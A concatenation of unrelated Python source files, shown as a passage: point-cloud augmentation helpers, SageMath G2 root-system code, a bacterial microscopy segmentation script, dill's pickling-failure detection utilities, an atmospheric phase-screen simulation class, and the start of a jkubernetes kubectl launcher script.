= None): """Uniform sampling on a 2-sphere Source: https://gist.github.com/andrewbolster/10274979 Args: num: Number of vectors to sample (or None if single) Returns: Random Vector (np.ndarray) of size (num, 3) with norm 1. If num is None returned value will have size (3,) """ if num is not None: phi = np.random.uniform(0.0, 2 * np.pi, num) cos_theta = np.random.uniform(-1.0, 1.0, num) else: phi = np.random.uniform(0.0, 2 * np.pi) cos_theta = np.random.uniform(-1.0, 1.0) theta = np.arccos(cos_theta) x = np.sin(theta) * np.cos(phi) y = np.sin(theta) * np.sin(phi) z = np.cos(theta) return np.stack((x, y, z), axis=-1) def random_crop(pc, p_keep): rand_xyz = uniform_2_sphere() centroid = np.mean(pc[:, :3], axis=0) pc_centered = pc[:, :3] - centroid dist_from_plane = np.dot(pc_centered, rand_xyz) mask = dist_from_plane > np.percentile(dist_from_plane, (1.0 - p_keep) * 100) return pc[mask, :] def shuffle_pc(pc): return np.random.permutation(pc) def flip_pc(pc, r=0.5): if np.random.random() > r: pc[:, 1] = -1 * pc[:, 1] return pc def angle(v1: torch.Tensor, v2: torch.Tensor): """Compute angle between 2 vectors For robustness, we use the same formulation as in PPFNet, i.e. angle(v1, v2) = atan2(cross(v1, v2), dot(v1, v2)). This handles the case where one of the vectors is 0.0, since torch.atan2(0.0, 0.0)=0.0 Args: v1: (B, *, 3) v2: (B, *, 3) Returns: """ cross_prod = torch.stack([v1[..., 1] * v2[..., 2] - v1[..., 2] * v2[..., 1], v1[..., 2] * v2[..., 0] - v1[..., 0] * v2[..., 2], v1[..., 0] * v2[..., 1] - v1[..., 1] * v2[..., 0]], dim=-1) cross_prod_norm = torch.norm(cross_prod, dim=-1) dot_prod = torch.sum(v1 * v2, dim=-1) return torch.atan2(cross_prod_norm, dot_prod)
""" Root system data for type G """ #***************************************************************************** # Copyright (C) 2008-2009 Daniel Bump # Copyright (C) 2008-2009 Justin Walker # Copyright (C) 2008-2013 Nicolas M. Thiery <nthiery at users.sf.net> # # Distributed under the terms of the GNU General Public License (GPL) # http://www.gnu.org/licenses/ #***************************************************************************** from __future__ import print_function from __future__ import absolute_import from . import ambient_space from sage.sets.family import Family from sage.combinat.root_system.root_lattice_realizations import RootLatticeRealizations class AmbientSpace(ambient_space.AmbientSpace): """ EXAMPLES:: sage: e = RootSystem(['G',2]).ambient_space(); e Ambient space of the Root system of type ['G', 2] One can not construct the ambient lattice because the simple coroots have rational coefficients:: sage: e.simple_coroots() Finite family {1: (0, 1, -1), 2: (1/3, -2/3, 1/3)} sage: e.smallest_base_ring() Rational Field By default, this ambient space uses the barycentric projection for plotting:: sage: L = RootSystem(["G",2]).ambient_space() sage: e = L.basis() sage: L._plot_projection(e[0]) (1/2, 989/1142) sage: L._plot_projection(e[1]) (-1, 0) sage: L._plot_projection(e[2]) (1/2, -989/1142) sage: L = RootSystem(["A",3]).ambient_space() sage: l = L.an_element(); l (2, 2, 3, 0) sage: L._plot_projection(l) (0, -1121/1189, 7/3) .. SEEALSO:: - :meth:`sage.combinat.root_system.root_lattice_realizations.RootLatticeRealizations.ParentMethods._plot_projection` TESTS:: sage: TestSuite(e).run() sage: [WeylDim(['G',2],[a,b]) for a,b in [[0,0], [1,0], [0,1], [1,1]]] # indirect doctest [1, 7, 14, 64] """ def dimension(self): """ EXAMPLES:: sage: e = RootSystem(['G',2]).ambient_space() sage: e.dimension() 3 """ return 3 def simple_root(self, i): """ EXAMPLES:: sage: CartanType(['G',2]).root_system().ambient_space().simple_roots() Finite family {1: (0, 1, -1), 2: (1, -2, 1)} """ return self.monomial(1)-self.monomial(2) if i == 1 else self.monomial(0)-2*self.monomial(1)+self.monomial(2) def positive_roots(self): """ EXAMPLES:: sage: CartanType(['G',2]).root_system().ambient_space().positive_roots() [(0, 1, -1), (1, -2, 1), (1, -1, 0), (1, 0, -1), (1, 1, -2), (2, -1, -1)] """ return [ self(v) for v in [[0,1,-1],[1,-2,1],[1,-1,0],[1,0,-1],[1,1,-2],[2,-1,-1]]] def negative_roots(self): """ EXAMPLES:: sage: CartanType(['G',2]).root_system().ambient_space().negative_roots() [(0, -1, 1), (-1, 2, -1), (-1, 1, 0), (-1, 0, 1), (-1, -1, 2), (-2, 1, 1)] """ return [ self(v) for v in [[0,-1,1],[-1,2,-1],[-1,1,0],[-1,0,1],[-1,-1,2],[-2,1,1]]] def fundamental_weights(self): """ EXAMPLES:: sage: CartanType(['G',2]).root_system().ambient_space().fundamental_weights() Finite family {1: (1, 0, -1), 2: (2, -1, -1)} """ return Family({ 1: self([1,0,-1]), 2: self([2,-1,-1])}) _plot_projection = RootLatticeRealizations.ParentMethods.__dict__['_plot_projection_barycentric'] from .cartan_type import CartanType_standard_finite, CartanType_simple, CartanType_crystallographic class CartanType(CartanType_standard_finite, CartanType_simple, CartanType_crystallographic): def __init__(self): """ EXAMPLES:: sage: ct = CartanType(['G',2]) sage: ct ['G', 2] sage: ct._repr_(compact = True) 'G2' sage: ct.is_irreducible() True sage: ct.is_finite() True sage: ct.is_crystallographic() True sage: ct.is_simply_laced() False sage: ct.dual() ['G', 2] relabelled by {1: 2, 2: 1} sage: ct.affine() ['G', 2, 1] TESTS:: sage: TestSuite(ct).run() """ CartanType_standard_finite.__init__(self, "G", 2) def _latex_(self): r""" Return a latex representation of ``self``. EXAMPLES:: sage: latex(CartanType(['G',2])) G_2 sage: latex(CartanType(['G',2]).dual()) G_2 \text{ relabelled by } \left\{1 : 2, 2 : 1\right\} """ return "G_2" AmbientSpace = AmbientSpace def coxeter_number(self): """ Return the Coxeter number associated with ``self``. EXAMPLES:: sage: CartanType(['G',2]).coxeter_number() 6 """ return 6 def dual_coxeter_number(self): """ Return the dual Coxeter number associated with ``self``. EXAMPLES:: sage: CartanType(['G',2]).dual_coxeter_number() 4 """ return 4 def dynkin_diagram(self): """ Returns a Dynkin diagram for type G. EXAMPLES:: sage: g = CartanType(['G',2]).dynkin_diagram() sage: g 3 O=<=O 1 2 G2 sage: sorted(g.edges()) [(1, 2, 1), (2, 1, 3)] """ from .dynkin_diagram import DynkinDiagram_class g = DynkinDiagram_class(self) g.add_edge(1,2) g.set_edge_label(2,1,3) return g def _latex_dynkin_diagram(self, label=lambda i: i, node=None, node_dist=2, dual=False): r""" Return a latex representation of the Dynkin diagram. EXAMPLES:: sage: print(CartanType(['G',2])._latex_dynkin_diagram()) \draw (0,0) -- (2 cm,0); \draw (0, 0.15 cm) -- +(2 cm,0); \draw (0, -0.15 cm) -- +(2 cm,0); \draw[shift={(0.8, 0)}, rotate=180] (135 : 0.45cm) -- (0,0) -- (-135 : 0.45cm); \draw[fill=white] (0 cm, 0 cm) circle (.25cm) node[below=4pt]{$1$}; \draw[fill=white] (2 cm, 0 cm) circle (.25cm) node[below=4pt]{$2$}; <BLANKLINE> """ if node is None: node = self._latex_draw_node ret = "\\draw (0,0) -- (%s cm,0);\n"%node_dist ret += "\\draw (0, 0.15 cm) -- +(%s cm,0);\n"%node_dist ret += "\\draw (0, -0.15 cm) -- +(%s cm,0);\n"%node_dist if dual: ret += self._latex_draw_arrow_tip(0.5*node_dist+0.2, 0, 0) else: ret += self._latex_draw_arrow_tip(0.5*node_dist-0.2, 0, 180) ret += node(0, 0, label(1)) ret += node(node_dist, 0, label(2)) return ret def ascii_art(self, label=lambda i: i, node=None): """ Return an ascii art representation of the Dynkin diagram. EXAMPLES:: sage: print(CartanType(['G',2]).ascii_art(label=lambda x: x+2)) 3 O=<=O 3 4 """ if node is None: node = self._ascii_art_node ret = " 3\n{}=<={}\n".format(node(label(1)), node(label(2))) return ret + "{!s:4}{!s:4}".format(label(1), label(2)) def dual(self): r""" Return the dual Cartan type. This uses that `G_2` is self-dual up to relabelling. EXAMPLES:: sage: G2 = CartanType(['G',2]) sage: G2.dual() ['G', 2] relabelled by {1: 2, 2: 1} sage: G2.dynkin_diagram() 3 O=<=O 1 2 G2 sage: G2.dual().dynkin_diagram() 3 O=<=O 2 1 G2 relabelled by {1: 2, 2: 1} """ return self.relabel({1:2, 2:1}) def _default_folded_cartan_type(self): """ Return the default folded Cartan type. EXAMPLES:: sage: CartanType(['G', 2])._default_folded_cartan_type() ['G', 2] as a folding of ['D', 4] """ from sage.combinat.root_system.type_folded import CartanTypeFolded return CartanTypeFolded(self, ['D', 4], [[1, 3, 4], [2]]) # For unpickling backward compatibility (Sage <= 4.1) from sage.structure.sage_object import register_unpickle_override register_unpickle_override('sage.combinat.root_system.type_G', 'ambient_space', AmbientSpace)
import os import glob # Our numerical workhorses import numpy as np import pandas as pd import scipy.special # Import the project utils import sys sys.path.insert(0, '../') import image_analysis_utils as im_utils # Useful plotting libraries import matplotlib.pyplot as plt import matplotlib.cm as cm import matplotlib as mpl import seaborn as sns # Image analysis libraries import skimage.io import skimage.filters import skimage.segmentation import scipy.ndimage # Set plotting style im_utils.set_plotting_style() #============================================================================== # METADATA #============================================================================== DATE = 20161118 USERNAME = 'mrazomej' OPERATOR = 'O2' BINDING_ENERGY = -13.9 REPRESSORS = (0, 0, 130) IPDIST = 0.160 # in units of µm per pixel STRAINS = ['auto', 'delta', 'RBS1027'] IPTG_RANGE = (0, 0.1, 5, 10, 25, 50, 75, 100, 250, 500, 1000, 5000) #============================================================================== # Define the data directory. data_dir = '../../../data/microscopy/' + str(DATE) + '/' # Glob the profile and noise images. yfp_glob = glob.glob(data_dir + '*yfp_profile*/*.tif') rfp_glob = glob.glob(data_dir + '*mCherry_profile*/*.tif') noise_glob = glob.glob(data_dir + '*noise*/*.tif') # Load the images as collections yfp_profile = skimage.io.ImageCollection(yfp_glob) rfp_profile = skimage.io.ImageCollection(rfp_glob) noise_profile = skimage.io.ImageCollection(noise_glob) # Need to split the noise profile image into the two channels noise_rfp = [noise_profile[i][0] for i, _ in enumerate(noise_profile)] noise_yfp = [noise_profile[i][1] for i, _ in enumerate(noise_profile)] # Generate averages and plot them. rfp_avg = im_utils.average_stack(rfp_profile) yfp_avg = im_utils.average_stack(yfp_profile) rfp_noise = im_utils.average_stack(noise_rfp) yfp_noise = im_utils.average_stack(noise_yfp) with sns.axes_style('white'): fig, ax = plt.subplots(2, 2, figsize=(6,6)) ax = ax.ravel() ax[0].imshow(yfp_avg, cmap=plt.cm.viridis) ax[0].set_title('yfp profile') ax[1].imshow(rfp_avg, cmap=plt.cm.plasma) ax[1].set_title('rfp profile') ax[2].imshow(yfp_noise, cmap=plt.cm.Greens_r) ax[2].set_title('yfp noise') ax[3].imshow(rfp_noise, cmap=plt.cm.Reds_r) ax[3].set_title('rfp noise') plt.tight_layout() plt.savefig('./outdir/background_correction.png') #============================================================================== # Iterate through each strain and concentration to make the dataframes. dfs = [] # Select random IPTG and random strain to print the example segmentation ex_iptg = np.random.choice(IPTG_RANGE) ex_strain = STRAINS[-1] for i, st in enumerate(STRAINS): print(st) for j, iptg in enumerate(IPTG_RANGE): # Load the images if (iptg==0) & (st != STRAINS[-1]): images = glob.glob(data_dir + '*' + st + '_*/*.tif') else: images = glob.glob(data_dir + '*' + st + '*_' + str(iptg) + 'uMIPTG*/*.ome.tif') if len(images) is not 0: ims = skimage.io.ImageCollection(images) # Select random image to print example segmentation ex_no = np.random.choice(np.arange(0, len(images) - 1)) for z, x in enumerate(ims): _, m, y = im_utils.ome_split(x) y_flat = im_utils.generate_flatfield(y, yfp_noise, yfp_avg) # Segment the mCherry channel. m_seg = im_utils.log_segmentation(m, label=True) # Print example segmentation for the random image if (st==ex_strain) & (iptg == ex_iptg) & (z == ex_no): merge = im_utils.example_segmentation(m_seg, _, 10/IPDIST) skimage.io.imsave('./outdir/example_segmentation.png', merge) # Extract the measurements. im_df = im_utils.props_to_df(m_seg, physical_distance=IPDIST, intensity_image=y_flat) # Add strain and IPTG concentration information. im_df.insert(0, 'IPTG_uM', iptg) im_df.insert(0, 'repressors', REPRESSORS[i]) im_df.insert(0, 'rbs', st) im_df.insert(0, 'binding_energy', BINDING_ENERGY) im_df.insert(0, 'operator', OPERATOR) im_df.insert(0, 'username', USERNAME) im_df.insert(0, 'date', DATE) # Append the dataframe to the global list. dfs.append(im_df) # Concatenate the dataframe df_im = pd.concat(dfs, axis=0) df_im.to_csv('./outdir/' + str(DATE) + '_' + OPERATOR + '_' +\ STRAINS[-1] + '_raw_segmentation.csv', index=False)
#!/usr/bin/env python # # Author: Mike McKerns (mmckerns @caltech and @uqfoundation) # Copyright (c) 2008-2016 California Institute of Technology. # Copyright (c) 2016-2019 The Uncertainty Quantification Foundation. # License: 3-clause BSD. The full license text is available at: # - https://github.com/uqfoundation/dill/blob/master/LICENSE """ Methods for detecting objects leading to pickling failures. """ import dis from inspect import ismethod, isfunction, istraceback, isframe, iscode from .pointers import parent, reference, at, parents, children from ._dill import _trace as trace from ._dill import PY3 __all__ = ['baditems','badobjects','badtypes','code','errors','freevars', 'getmodule','globalvars','nestedcode','nestedglobals','outermost', 'referredglobals','referrednested','trace','varnames'] def getmodule(object, _filename=None, force=False): """get the module of the object""" from inspect import getmodule as getmod module = getmod(object, _filename) if module or not force: return module if PY3: builtins = 'builtins' else: builtins = '__builtin__' builtins = __import__(builtins) from .source import getname name = getname(object, force=True) return builtins if name in vars(builtins).keys() else None def outermost(func): # is analogous to getsource(func,enclosing=True) """get outermost enclosing object (i.e. the outer function in a closure) NOTE: this is the object-equivalent of getsource(func, enclosing=True) """ if PY3: if ismethod(func): _globals = func.__func__.__globals__ or {} elif isfunction(func): _globals = func.__globals__ or {} else: return #XXX: or raise? no matches _globals = _globals.items() else: if ismethod(func): _globals = func.im_func.func_globals or {} elif isfunction(func): _globals = func.func_globals or {} else: return #XXX: or raise? no matches _globals = _globals.iteritems() # get the enclosing source from .source import getsourcelines try: lines,lnum = getsourcelines(func, enclosing=True) except: #TypeError, IOError lines,lnum = [],None code = ''.join(lines) # get all possible names,objects that are named in the enclosing source _locals = ((name,obj) for (name,obj) in _globals if name in code) # now only save the objects that generate the enclosing block for name,obj in _locals: #XXX: don't really need 'name' try: if getsourcelines(obj) == (lines,lnum): return obj except: #TypeError, IOError pass return #XXX: or raise? no matches def nestedcode(func, recurse=True): #XXX: or return dict of {co_name: co} ? """get the code objects for any nested functions (e.g. in a closure)""" func = code(func) if not iscode(func): return [] #XXX: or raise? no matches nested = set() for co in func.co_consts: if co is None: continue co = code(co) if co: nested.add(co) if recurse: nested |= set(nestedcode(co, recurse=True)) return list(nested) def code(func): '''get the code object for the given function or method NOTE: use dill.source.getsource(CODEOBJ) to get the source code ''' if PY3: im_func = '__func__' func_code = '__code__' else: im_func = 'im_func' func_code = 'func_code' if ismethod(func): func = getattr(func, im_func) if isfunction(func): func = getattr(func, func_code) if istraceback(func): func = func.tb_frame if isframe(func): func = func.f_code if iscode(func): return func return #XXX: ugly: parse dis.dis for name after "<code object" in line and in globals? def referrednested(func, recurse=True): #XXX: return dict of {__name__: obj} ? """get functions defined inside of func (e.g. inner functions in a closure) NOTE: results may differ if the function has been executed or not. If len(nestedcode(func)) > len(referrednested(func)), try calling func(). If possible, python builds code objects, but delays building functions until func() is called. """ if PY3: att1 = '__code__' att0 = '__func__' else: att1 = 'func_code' # functions att0 = 'im_func' # methods import gc funcs = set() # get the code objects, and try to track down by referrence for co in nestedcode(func, recurse): # look for function objects that refer to the code object for obj in gc.get_referrers(co): # get methods _ = getattr(obj, att0, None) # ismethod if getattr(_, att1, None) is co: funcs.add(obj) # get functions elif getattr(obj, att1, None) is co: funcs.add(obj) # get frame objects elif getattr(obj, 'f_code', None) is co: funcs.add(obj) # get code objects elif hasattr(obj, 'co_code') and obj is co: funcs.add(obj) # frameobjs => func.func_code.co_varnames not in func.func_code.co_cellvars # funcobjs => func.func_code.co_cellvars not in func.func_code.co_varnames # frameobjs are not found, however funcobjs are... # (see: test_mixins.quad ... and test_mixins.wtf) # after execution, code objects get compiled, and then may be found by gc return list(funcs) def freevars(func): """get objects defined in enclosing code that are referred to by func returns a dict of {name:object}""" if PY3: im_func = '__func__' func_code = '__code__' func_closure = '__closure__' else: im_func = 'im_func' func_code = 'func_code' func_closure = 'func_closure' if ismethod(func): func = getattr(func, im_func) if isfunction(func): closures = getattr(func, func_closure) or () func = getattr(func, func_code).co_freevars # get freevars else: return {} return dict((name,c.cell_contents) for (name,c) in zip(func,closures)) # thanks to Davies Liu for recursion of globals def nestedglobals(func, recurse=True): """get the names of any globals found within func""" func = code(func) if func is None: return list() from .temp import capture names = set() with capture('stdout') as out: dis.dis(func) #XXX: dis.dis(None) disassembles last traceback for line in out.getvalue().splitlines(): if '_GLOBAL' in line: name = line.split('(')[-1].split(')')[0] names.add(name) for co in getattr(func, 'co_consts', tuple()): if co and recurse and iscode(co): names.update(nestedglobals(co, recurse=True)) return list(names) def referredglobals(func, recurse=True, builtin=False): """get the names of objects in the global scope referred to by func""" return globalvars(func, recurse, builtin).keys() def globalvars(func, recurse=True, builtin=False): """get objects defined in global scope that are referred to by func return a dict of {name:object}""" if PY3: im_func = '__func__' func_code = '__code__' func_globals = '__globals__' func_closure = '__closure__' else: im_func = 'im_func' func_code = 'func_code' func_globals = 'func_globals' func_closure = 'func_closure' if ismethod(func): func = getattr(func, im_func) if isfunction(func): globs = vars(getmodule(sum)).copy() if builtin else {} # get references from within closure orig_func, func = func, set() for obj in getattr(orig_func, func_closure) or {}: _vars = globalvars(obj.cell_contents, recurse, builtin) or {} func.update(_vars) #XXX: (above) be wary of infinte recursion? globs.update(_vars) # get globals globs.update(getattr(orig_func, func_globals) or {}) # get names of references if not recurse: func.update(getattr(orig_func, func_code).co_names) else: func.update(nestedglobals(getattr(orig_func, func_code))) # find globals for all entries of func for key in func.copy(): #XXX: unnecessary...? nested_func = globs.get(key) if nested_func is orig_func: #func.remove(key) if key in func else None continue #XXX: globalvars(func, False)? func.update(globalvars(nested_func, True, builtin)) elif iscode(func): globs = vars(getmodule(sum)).copy() if builtin else {} #globs.update(globals()) if not recurse: func = func.co_names # get names else: orig_func = func.co_name # to stop infinite recursion func = set(nestedglobals(func)) # find globals for all entries of func for key in func.copy(): #XXX: unnecessary...? if key is orig_func: #func.remove(key) if key in func else None continue #XXX: globalvars(func, False)? nested_func = globs.get(key) func.update(globalvars(nested_func, True, builtin)) else: return {} #NOTE: if name not in func_globals, then we skip it... return dict((name,globs[name]) for name in func if name in globs) def varnames(func): """get names of variables defined by func returns a tuple (local vars, local vars referrenced by nested functions)""" func = code(func) if not iscode(func): return () #XXX: better ((),())? or None? return func.co_varnames, func.co_cellvars def baditems(obj, exact=False, safe=False): #XXX: obj=globals() ? """get items in object that fail to pickle""" if not hasattr(obj,'__iter__'): # is not iterable return [j for j in (badobjects(obj,0,exact,safe),) if j is not None] obj = obj.values() if getattr(obj,'values',None) else obj _obj = [] # can't use a set, as items may be unhashable [_obj.append(badobjects(i,0,exact,safe)) for i in obj if i not in _obj] return [j for j in _obj if j is not None] def badobjects(obj, depth=0, exact=False, safe=False): """get objects that fail to pickle""" from dill import pickles if not depth: if pickles(obj,exact,safe): return None return obj return dict(((attr, badobjects(getattr(obj,attr),depth-1,exact,safe)) \ for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe))) def badtypes(obj, depth=0, exact=False, safe=False): """get types for objects that fail to pickle""" from dill import pickles if not depth: if pickles(obj,exact,safe): return None return type(obj) return dict(((attr, badtypes(getattr(obj,attr),depth-1,exact,safe)) \ for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe))) def errors(obj, depth=0, exact=False, safe=False): """get errors for objects that fail to pickle""" from dill import pickles, copy if not depth: try: pik = copy(obj) if exact: assert pik == obj, \ "Unpickling produces %s instead of %s" % (pik,obj) assert type(pik) == type(obj), \ "Unpickling produces %s instead of %s" % (type(pik),type(obj)) return None except Exception: import sys return sys.exc_info()[1] _dict = {} for attr in dir(obj): try: _attr = getattr(obj,attr) except Exception: import sys _dict[attr] = sys.exc_info()[1] continue if not pickles(_attr,exact,safe): _dict[attr] = errors(_attr,depth-1,exact,safe) return _dict # EOF
from __future__ import division from .atmospheric_model import AtmosphericLayer, phase_covariance_von_karman, fried_parameter_from_Cn_squared from ..statistics import SpectralNoiseFactoryMultiscale from ..field import Field, RegularCoords, UnstructuredCoords, CartesianGrid from .finite_atmospheric_layer import FiniteAtmosphericLayer import numpy as np from scipy import linalg from scipy.ndimage import affine_transform import time import warnings class InfiniteAtmosphericLayer(AtmosphericLayer): def __init__(self, input_grid, Cn_squared=None, L0=np.inf, velocity=0, height=0, stencil_length=2, use_interpolation=False): self._initialized = False AtmosphericLayer.__init__(self, input_grid, Cn_squared, L0, velocity, height) # Check properties of input_grid if not input_grid.is_('cartesian'): raise ValueError('Input grid must be cartesian.') if not input_grid.is_regular: raise ValueError('Input grid must be regularly spaced') if not input_grid.ndim == 2: raise ValueError('Input grid must be two-dimensional.') self.stencil_length = stencil_length self.use_interpolation = use_interpolation self._make_stencils() self._make_covariance_matrices() self._make_AB_matrices() self._make_initial_phase_screen() self.center = np.zeros(2) self._initialized = True def _recalculate_matrices(self): if self._initialized: self._make_covariance_matrices() self._make_AB_matrices() def _make_stencils(self): # Vertical self.new_grid_bottom = CartesianGrid(RegularCoords(self.input_grid.delta, [self.input_grid.dims[0], 1], self.input_grid.zero - np.array([0, self.input_grid.delta[1]]))) self.stencil_bottom = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped self.stencil_bottom[:self.stencil_length,:] = True for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[0])): self.stencil_bottom[(n + self.stencil_length - 1) % self.input_grid.dims[1],i] = True self.stencil_bottom = self.stencil_bottom.ravel() self.num_stencils_vertical = np.sum(self.stencil_bottom) # Horizontal self.new_grid_left = CartesianGrid(RegularCoords(self.input_grid.delta, [1, self.input_grid.dims[1]], self.input_grid.zero - np.array([self.input_grid.delta[0], 0]))) self.stencil_left = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped self.stencil_left[:,:self.stencil_length] = True for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[1])): self.stencil_left[i,(n + self.stencil_length - 1) % self.input_grid.dims[0]] = True self.stencil_left = self.stencil_left.ravel() self.num_stencils_horizontal = np.sum(self.stencil_left) def _make_covariance_matrices(self): phase_covariance = phase_covariance_von_karman(fried_parameter_from_Cn_squared(1, 1), self.L0) # Vertical x = np.concatenate((self.input_grid.x[self.stencil_bottom], self.new_grid_bottom.x)) x = np.concatenate([x - xx for xx in x]) y = np.concatenate((self.input_grid.y[self.stencil_bottom], self.new_grid_bottom.y)) y = np.concatenate([y - yy for yy in y]) separations = CartesianGrid(UnstructuredCoords((x, y))) n = self.new_grid_bottom.size + self.num_stencils_vertical self.cov_matrix_vertical = phase_covariance(separations).reshape((n, n)) # Horizontal x = np.concatenate((self.input_grid.x[self.stencil_left], self.new_grid_left.x)) x = np.concatenate([x - xx for xx in x]) y = np.concatenate((self.input_grid.y[self.stencil_left], self.new_grid_left.y)) y = np.concatenate([y - yy for yy in y]) separations = CartesianGrid(UnstructuredCoords((x, y))) n = self.new_grid_left.size + self.num_stencils_horizontal self.cov_matrix_horizontal = phase_covariance(separations).reshape((n, n)) def _make_AB_matrices(self): # Vertical n = self.num_stencils_vertical cov_zz = self.cov_matrix_vertical[:n,:n] cov_xz = self.cov_matrix_vertical[n:, :n] cov_zx = self.cov_matrix_vertical[:n, n:] cov_xx = self.cov_matrix_vertical[n:, n:] cf = linalg.cho_factor(cov_zz) inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0])) self.A_vertical = cov_xz.dot(inv_cov_zz) BBt = cov_xx - self.A_vertical.dot(cov_zx) U, S, Vt = np.linalg.svd(BBt) L = np.sqrt(S[:self.input_grid.dims[0]]) self.B_vertical = U * L # Horizontal n = self.num_stencils_horizontal cov_zz = self.cov_matrix_horizontal[:n,:n] cov_xz = self.cov_matrix_horizontal[n:, :n] cov_zx = self.cov_matrix_horizontal[:n, n:] cov_xx = self.cov_matrix_horizontal[n:, n:] cf = linalg.cho_factor(cov_zz) inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0])) self.A_horizontal = cov_xz.dot(inv_cov_zz) BBt = cov_xx - self.A_horizontal.dot(cov_zx) U, S, Vt = np.linalg.svd(BBt) L = np.sqrt(S[:self.input_grid.dims[1]]) self.B_horizontal = U * L def _make_initial_phase_screen(self): oversampling = 16 layer = FiniteAtmosphericLayer(self.input_grid, self.Cn_squared, self.outer_scale, self.velocity, self.height, oversampling) self._achromatic_screen = layer.phase_for(1) self._shifted_achromatic_screen = self._achromatic_screen def _extrude(self, where=None): flipped = (where == 'top') or (where == 'right') horizontal = (where == 'left') or (where == 'right') if where == 'top' or where == 'right': screen = self._achromatic_screen[::-1] else: screen = self._achromatic_screen if horizontal: stencil = self.stencil_left A = self.A_horizontal B = self.B_horizontal else: stencil = self.stencil_bottom A = self.A_vertical B = self.B_vertical stencil_data = screen[stencil] random_data = np.random.normal(0, 1, size=B.shape[1]) new_slice = A.dot(stencil_data) + B.dot(random_data) * np.sqrt(self._Cn_squared) screen = screen.shaped if horizontal: screen = np.hstack((new_slice[:,np.newaxis], screen[:,:-1])) else: screen = np.vstack((new_slice[np.newaxis,:], screen[:-1,:])) screen = Field(screen, self.input_grid) if flipped: self._achromatic_screen = screen[::-1,::-1].ravel() else: self._achromatic_screen = screen.ravel() def phase_for(self, wavelength): return self._shifted_achromatic_screen / wavelength def reset(self): self._make_initial_phase_screen() self.center = np.zeros(2) self._t = 0 def evolve_until(self, t): if t is None: self.reset() return old_center = np.round(self.center / self.input_grid.delta).astype('int') self.center = self.velocity * t new_center = np.round(self.center / self.input_grid.delta).astype('int') delta = new_center - old_center for i in range(abs(delta[0])): if delta[0] < 0: self._extrude('left') else: self._extrude('right') for i in range(abs(delta[1])): if delta[1] < 0: self._extrude('bottom') else: self._extrude('top') if self.use_interpolation: # Use bilinear interpolation to interpolate the achromatic phase screen to the correct position. # This is to avoid sudden shifts by discrete pixels. ps = self._achromatic_screen.shaped sub_delta = self.center - new_center * self.input_grid.delta with warnings.catch_warnings(): warnings.filterwarnings('ignore', message='The behaviour of affine_transform with a one-dimensional array supplied for the matrix parameter has changed in scipy 0.18.0.') self._shifted_achromatic_screen = affine_transform(ps, np.array([1,1]), (sub_delta / self.input_grid.delta)[::-1], mode='nearest', order=1).ravel() else: self._shifted_achromatic_screen = self._achromatic_screen @property def Cn_squared(self): return self._Cn_squared @Cn_squared.setter def Cn_squared(self, Cn_squared): self._Cn_squared = Cn_squared @property def outer_scale(self): return self._L0 @outer_scale.setter def L0(self, L0): self._L0 = L0 self._recalculate_matrices()
#!/bin/env python import os import sys import random import subprocess as sub import getopt import time def identity(x): return x def cygpath(x): command = ["cygpath", "-wp", x] p = sub.Popen(command,stdout=sub.PIPE) output, errors = p.communicate() lines = output.split("\n") return lines[0] if sys.platform == "cygwin": normclasspath = cygpath else: normclasspath = identity CUSTOM_CONF_FILE = "" CONFIG_OPTS = [] STATUS = 0 JKUBERNETES_DIR = "/".join(os.path.realpath( __file__ ).split("/")[:-2]) JKUBERNETES_CONF_DIR = os.getenv("JKUBERNETES_CONF_DIR", JKUBERNETES_DIR + "/conf" ) CONFIG_OPTS = [] EXCLUDE_JARS = [] INCLUDE_JARS = [] API_SERVER_ADDRESS = "" JKUBERNETES_CREATE_YAML_PATH = "" def check_java(): check_java_cmd = 'which java' ret = os.system(check_java_cmd) if ret != 0: print("Failed to find java, please add java to PATH") sys.exit(-1) def print_commands(): """Print all client commands and link to documentation""" print ("kubectl command [-s http://apiserverip:port]") print ("Commands:\n\t", "\n\t".join(sorted(COMMANDS.keys()))) print ("\nHelp:", "\n\thelp", "\n\thelp <command>") print ("\nDocumentation for the jkubernetes client can be found at https://github.com/gwisoft/jkubernetes/wiki/jkubernetes-Chinese-Documentation\n") def get_jars_full(adir): ret = [] temp = adir.strip() print (temp == "") if temp == "": return ret files = os.listdir(adir) for f in files: if f.endswith(".jar") == False: continue filter = False for exclude_jar in EXCLUDE_JARS: if f.find(exclude_jar) >= 0: filter = True break if filter == True: print ("Don't add " + f + " to classpath") else: ret.append(adir + "/" + f) return ret def unknown_command(*args): print ("Unknown command: [kubectl %s]" % ' '.join(sys.argv[1:])) print_usage() def print_usage(command=None): """Print one help message or list of available commands""" if command != None: if command in COMMANDS: print (COMMANDS[command].__doc__ or "No documentation provided for <%s>" % command) else: print ("<%s> is not a valid command" % command) else: print_commands() def parse_config_opts_and_args(args): curr = args[:] curr.reverse() config_list = [] args_list = [] while len(curr) > 0: token = curr.pop() if token == "-s": global API_SERVER_ADDRESS API_SERVER_ADDRESS = curr.pop() elif token == "-c": config_list.append(curr.pop()) elif token == "--config": global CUSTOM_CONF_FILE CUSTOM_CONF_FILE = curr.pop() else: args_list.append(token) print ("config_list=") print (config_list) print ("args_list=") print (args_list) return config_list, args_list def parse_config_opts(config_list): global CONFIG_OPTS if len(config_list) > 0: for config in config_list: CONFIG_OPTS.append(config) def filter_array(array): ret = [] for item in array: temp = item.strip() if temp != "": ret.append(temp) return ret def get_config_opts(): global CONFIG_OPTS print ("-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%")) return "-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%") #扩展的jar包入参 def get_exclude_jars(): global EXCLUDE_JARS return " -Dexclude.jars=" + (','.join(EXCLUDE_JARS)) def create(args): """ kubectl create -f ***.yaml """ pass args = parse_client_createopts(args) childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts() print ("childopts=") print (childopts) exec_jkubernetes_class( "org.gwisoft.jkubernetes.kubectl.KubectlCreate", jvmtype="-client -Xms256m -Xmx256m", sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE], args=args, 